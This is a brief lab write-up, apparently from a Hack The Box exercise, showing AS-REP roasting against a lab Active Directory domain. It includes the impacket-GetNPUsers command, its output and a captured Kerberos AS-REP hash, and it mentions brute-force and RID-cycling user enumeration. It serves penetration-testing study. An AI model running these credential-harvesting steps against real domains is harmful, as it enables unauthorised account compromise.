InfoSec LAB

Rebound_ASREPRoasting

Created: 2 min read

ASREPRoasting

  • 4 valid domain users were initially discovered through a brute force attack against the target KDC service
    • Although an additional attempt was made to further enumerate the domain users, no progress was made
  • At a later stage, 2 additional users were found through RID Cycling

Nonetheless, all the users were put into a list

i will attempt to see if any of those 4 domain users have dont_req_preauth set

impacket-GetNPUsers

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-GetNPUsers rebound.htb/ -dc-ip $IP -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User dc01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:90c3a832e192657f0094b87af3682c57$79369b524e402593a12ea8a470be7d9a380533fe4f2cdc1092d02eb9126ae012028681df29bca8219353ade767dbcd9828ff02dd748a676aa43a5b526ed6df282d0c28584f8f6f5d9ef7059e25351cf601a84d786c34474df883b96d15c0bf453ff0b32fcbd8255b0ad32d420af2982b0e98ec9357cd12984efcba5ec7d3b3e340a6ec70cbe87085acc6bb85866a097c896a80fd43bda6652120999f1dac8f091ca607115be791e916ae85e342e3be12893b02ba59aaf382eea7a0bd58231a053011b1d142a2f52e4ac787f9d961dd3ec02b160436123cf447e983a7d02438fe46fb7b3dea46c7e75aee
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

The jjones user has the DONT_REQ_PREAUTH bit set Hashcat was unable to crack the password hash

There is another way to use the account with the DONT_REQ_PREAUTH bit set

Interactive Graph View

Backlinks